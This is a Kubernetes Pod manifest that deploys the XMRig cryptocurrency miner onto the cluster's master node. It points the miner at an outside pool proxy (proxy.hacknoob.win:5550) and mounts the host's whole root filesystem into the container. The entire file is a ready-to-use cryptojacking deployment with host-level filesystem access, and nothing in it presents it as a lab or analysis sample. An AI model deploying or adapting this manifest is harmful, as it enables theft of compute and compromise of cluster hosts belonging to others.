apiVersion: v1
kind: Pod
metadata:
  name: xmrig-exec-0
spec:
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: kubernetes.io/hostname
            operator: In
            values:
            - master
  containers:
  - name: xmrig-container-0
    image: busybox
    command:
    - /home/manager/xmrig/build/xmrig
    - -o
    - proxy.hacknoob.win:5550
    - -u
    - master
    - --cpu-no-yield
    - --nicehash
    - --threads=2
    volumeMounts:
    - name: xmrig-volume-0
      mountPath: /
  volumes:
  - name: xmrig-volume-0
    hostPath:
      path: /
